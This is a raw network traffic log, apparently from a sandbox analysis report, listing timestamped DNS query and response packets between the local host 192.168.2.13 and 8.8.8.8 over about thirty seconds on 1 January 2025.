          Jan 1, 2025 15:07:08.344839096 CET53556458.8.8.8192.168.2.13
          Jan 1, 2025 15:07:09.938019991 CET5505053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:09.944700956 CET53550508.8.8.8192.168.2.13
          Jan 1, 2025 15:07:09.952773094 CET3741453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:09.959394932 CET53374148.8.8.8192.168.2.13
          Jan 1, 2025 15:07:09.960671902 CET4506453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:09.967611074 CET53450648.8.8.8192.168.2.13
          Jan 1, 2025 15:07:09.969371080 CET4266053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:09.976351976 CET53426608.8.8.8192.168.2.13
          Jan 1, 2025 15:07:09.981895924 CET4309353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:09.989470959 CET53430938.8.8.8192.168.2.13
          Jan 1, 2025 15:07:09.990401030 CET5165853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:09.996630907 CET53516588.8.8.8192.168.2.13
          Jan 1, 2025 15:07:09.997394085 CET4730353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:10.003696918 CET53473038.8.8.8192.168.2.13
          Jan 1, 2025 15:07:10.004626989 CET5498553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:10.010761976 CET53549858.8.8.8192.168.2.13
          Jan 1, 2025 15:07:10.011722088 CET3784153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:10.017931938 CET53378418.8.8.8192.168.2.13
          Jan 1, 2025 15:07:10.018913984 CET6044853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:10.025419950 CET53604488.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.608403921 CET4278953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.615784883 CET53427898.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.616652012 CET4059553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.623531103 CET53405958.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.624285936 CET4058453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.631347895 CET53405848.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.632241964 CET4210653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.639502048 CET53421068.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.640289068 CET3650853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.647221088 CET53365088.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.648102045 CET6096653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.654675007 CET53609668.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.656558037 CET3715653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.662909985 CET53371568.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.663995981 CET5474453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.670305967 CET53547448.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.671125889 CET3456053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.677366018 CET53345608.8.8.8192.168.2.13
          Jan 1, 2025 15:07:11.678425074 CET4957653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:11.684802055 CET53495768.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.232737064 CET6014953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.239728928 CET53601498.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.240437031 CET3512153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.247348070 CET53351218.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.247997999 CET5407053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.254926920 CET53540708.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.255707979 CET5354753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.263041973 CET53535478.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.263706923 CET5195453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.270812035 CET53519548.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.271496058 CET5549853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.277896881 CET53554988.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.278552055 CET3738753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.285140038 CET53373878.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.285805941 CET3920253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.292061090 CET53392028.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.292726040 CET5373353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.298973083 CET53537338.8.8.8192.168.2.13
          Jan 1, 2025 15:07:13.299747944 CET4802553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:13.305923939 CET53480258.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.888408899 CET4732853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.895338058 CET53473288.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.896267891 CET3795753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.903615952 CET53379578.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.904524088 CET3382853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.911469936 CET53338288.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.912623882 CET5897553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.919473886 CET53589758.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.920348883 CET5258253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.927393913 CET53525828.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.928273916 CET4555553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.938366890 CET53455558.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.939435959 CET3965253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.945758104 CET53396528.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.946732998 CET3861453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.952969074 CET53386148.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.954582930 CET5877953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.960813046 CET53587798.8.8.8192.168.2.13
          Jan 1, 2025 15:07:14.961636066 CET5499253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:14.967808962 CET53549928.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.496642113 CET4144353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.503617048 CET53414438.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.505904913 CET4369353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.513207912 CET53436938.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.513978004 CET5768053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.521327019 CET53576808.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.522221088 CET4993453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.530440092 CET53499348.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.531166077 CET4320953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.538244963 CET53432098.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.538992882 CET3762853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.545229912 CET53376288.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.545959949 CET3570553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.553694963 CET53357058.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.554600954 CET3436053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.560863972 CET53343608.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.561774969 CET4203753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.568181038 CET53420378.8.8.8192.168.2.13
          Jan 1, 2025 15:07:16.570272923 CET5117653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:16.576626062 CET53511768.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.156457901 CET4022253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.163531065 CET53402228.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.164170980 CET5752353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.171643019 CET53575238.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.172430992 CET5415453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.179389954 CET53541548.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.180038929 CET4074553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.186698914 CET53407458.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.187463999 CET3798453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.200762987 CET53379848.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.201391935 CET5997153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.207801104 CET53599718.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.208421946 CET3663053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.214869022 CET53366308.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.215488911 CET3463253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.221890926 CET53346328.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.222553968 CET4591253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.229288101 CET53459128.8.8.8192.168.2.13
          Jan 1, 2025 15:07:18.229923010 CET4559753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:18.236186028 CET53455978.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.800267935 CET5863753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.807327032 CET53586378.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.807985067 CET4771153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.815381050 CET53477118.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.816037893 CET5026453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.822921038 CET53502648.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.823559046 CET4438453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.830281973 CET53443848.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.831161976 CET4848253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.838018894 CET53484828.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.838664055 CET3943653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.844837904 CET53394368.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.845904112 CET4630453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.852143049 CET53463048.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.852794886 CET3701453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.859276056 CET53370148.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.859877110 CET4393553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.865964890 CET53439358.8.8.8192.168.2.13
          Jan 1, 2025 15:07:19.866636038 CET5731553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:19.872843981 CET53573158.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.433852911 CET5190553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.441257000 CET53519058.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.441893101 CET4906453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.449338913 CET53490648.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.450057983 CET3428753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.457077026 CET53342878.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.457791090 CET4959453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.464684963 CET53495948.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.465527058 CET4560353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.473297119 CET53456038.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.474061012 CET4674453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.480365038 CET53467448.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.481179953 CET6060053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.487298012 CET53606008.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.487962008 CET4241553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.494338989 CET53424158.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.495055914 CET3382553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.501399040 CET53338258.8.8.8192.168.2.13
          Jan 1, 2025 15:07:21.502033949 CET5821753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:21.508404016 CET53582178.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.046040058 CET4782353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.053318024 CET53478238.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.054008961 CET5552453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.061132908 CET53555248.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.061805010 CET3389453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.069127083 CET53338948.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.069772959 CET5794953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.076859951 CET53579498.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.077857018 CET3495753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.084759951 CET53349578.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.085422039 CET3988553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.091705084 CET53398858.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.092343092 CET3639153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.098560095 CET53363918.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.099209070 CET4603353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.105478048 CET53460338.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.106152058 CET4042553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.112452984 CET53404258.8.8.8192.168.2.13
          Jan 1, 2025 15:07:23.113115072 CET5752353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:23.119462013 CET53575238.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.688576937 CET3866553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.695576906 CET53386658.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.696527958 CET4708253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.703560114 CET53470828.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.704453945 CET4411953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.711354017 CET53441198.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.712219000 CET3957153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.719559908 CET53395718.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.720345974 CET5713453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.727137089 CET53571348.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.728022099 CET4932753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.734318018 CET53493278.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.736263990 CET3931353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.742485046 CET53393138.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.743267059 CET4729353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.749775887 CET53472938.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.750628948 CET4318253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.756792068 CET53431828.8.8.8192.168.2.13
          Jan 1, 2025 15:07:24.757697105 CET3737553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:24.764002085 CET53373758.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.368468046 CET4001653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.376101017 CET53400168.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.377245903 CET5437753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.384202003 CET53543778.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.385137081 CET4478653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.392565966 CET53447868.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.393403053 CET4300653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.400634050 CET53430068.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.401738882 CET5283553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.408608913 CET53528358.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.409400940 CET5687753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.416043997 CET53568778.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.417102098 CET5475053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.430493116 CET53547508.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.431391001 CET4430253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.438759089 CET53443028.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.439554930 CET4175853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.445765972 CET53417588.8.8.8192.168.2.13
          Jan 1, 2025 15:07:26.446691990 CET5164853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:26.453012943 CET53516488.8.8.8192.168.2.13
          Jan 1, 2025 15:07:27.987689972 CET5590853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:27.995223999 CET53559088.8.8.8192.168.2.13
          Jan 1, 2025 15:07:27.995989084 CET3488253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.003144979 CET53348828.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.003757954 CET5558753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.011203051 CET53555878.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.011892080 CET6088053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.018845081 CET53608808.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.019496918 CET3785753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.026211023 CET53378578.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.026868105 CET5443953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.033206940 CET53544398.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.033873081 CET4401553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.040026903 CET53440158.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.040709019 CET4307753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.047076941 CET53430778.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.047749996 CET5861453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.053883076 CET53586148.8.8.8192.168.2.13
          Jan 1, 2025 15:07:28.054544926 CET4513053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:28.060837030 CET53451308.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.606349945 CET3728853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.613372087 CET53372888.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.614006042 CET4762053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.620765924 CET53476208.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.621367931 CET4280553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.631227970 CET53428058.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.631804943 CET4207153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.639477968 CET53420718.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.640038967 CET5179053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.648185968 CET53517908.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.648781061 CET5705653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.655390978 CET53570568.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.655962944 CET3640453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.662283897 CET53364048.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.662986040 CET4853053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.669107914 CET53485308.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.669864893 CET4485953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.675992012 CET53448598.8.8.8192.168.2.13
          Jan 1, 2025 15:07:29.676677942 CET5379653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:29.682881117 CET53537968.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.216545105 CET5239353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.223368883 CET53523938.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.224227905 CET5109553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.231482983 CET53510958.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.232325077 CET3834453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.239200115 CET53383448.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.240138054 CET4808453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.246841908 CET53480848.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.247698069 CET3900153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.255871058 CET53390018.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.256643057 CET5765053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.262825966 CET53576508.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.263602972 CET5452753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.269844055 CET53545278.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.270608902 CET3703153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.276792049 CET53370318.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.277659893 CET5888353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.283895016 CET53588838.8.8.8192.168.2.13
          Jan 1, 2025 15:07:31.284590960 CET4523353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:31.291130066 CET53452338.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.893280029 CET3960253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.900136948 CET53396028.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.900969028 CET5024553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.908194065 CET53502458.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.908977985 CET4501353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.915954113 CET53450138.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.916754007 CET5624953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.923624039 CET53562498.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.924335003 CET3408553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.931032896 CET53340858.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.931863070 CET5338753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.938492060 CET53533878.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.939281940 CET5471653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.945447922 CET53547168.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.946264029 CET5159153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.952497005 CET53515918.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.953298092 CET4510053192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.959422112 CET53451008.8.8.8192.168.2.13
          Jan 1, 2025 15:07:32.960357904 CET5580653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:32.966519117 CET53558068.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.541987896 CET4401153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.549062967 CET53440118.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.550014019 CET5972653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.556976080 CET53597268.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.557986021 CET3279753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.564847946 CET53327978.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.565890074 CET4164253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.572650909 CET53416428.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.573685884 CET3882253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.580732107 CET53388228.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.584029913 CET5040953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.590224981 CET53504098.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.591622114 CET4225553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.598006964 CET53422558.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.598958969 CET4638653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.605079889 CET53463868.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.606142998 CET3604353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.612355947 CET53360438.8.8.8192.168.2.13
          Jan 1, 2025 15:07:34.613291979 CET4461353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:34.619587898 CET53446138.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.192301989 CET4796453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.199201107 CET53479648.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.200335026 CET3944353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.207097054 CET53394438.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.207921982 CET3374653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.214795113 CET53337468.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.215683937 CET5370853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.222254038 CET53537088.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.223138094 CET4563853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.230411053 CET53456388.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.231398106 CET4005353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.237580061 CET53400538.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.238517046 CET3562153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.244761944 CET53356218.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.245646000 CET5852653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.252943039 CET53585268.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.253899097 CET5696953192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.265325069 CET53569698.8.8.8192.168.2.13
          Jan 1, 2025 15:07:36.266170979 CET5741353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:36.272476912 CET53574138.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.110368967 CET3328453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.117640018 CET53332848.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.118410110 CET4090453192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.125428915 CET53409048.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.126177073 CET3917153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.133320093 CET53391718.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.134037971 CET3454553192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.141263962 CET53345458.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.143394947 CET4293353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.150407076 CET53429338.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.151170015 CET4797753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.157670975 CET53479778.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.158338070 CET5299653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.164598942 CET53529968.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.165307045 CET4194153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.171554089 CET53419418.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.172260046 CET4662753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.178438902 CET53466278.8.8.8192.168.2.13
          Jan 1, 2025 15:07:38.179258108 CET3803753192.168.2.138.8.8.8
          Jan 1, 2025 15:07:38.185703039 CET53380378.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.739016056 CET4326853192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.746176004 CET53432688.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.747071981 CET4963253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.753752947 CET53496328.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.754726887 CET5053153192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.761873960 CET53505318.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.762734890 CET5826353192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.769575119 CET53582638.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.770478964 CET3552653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.777462006 CET53355268.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.778321028 CET5556253192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.784845114 CET53555628.8.8.8192.168.2.13
          Jan 1, 2025 15:07:39.785753965 CET3953653192.168.2.138.8.8.8
          Jan 1, 2025 15:07:39.792258978 CET53395368.8.8.8192.168.2.13
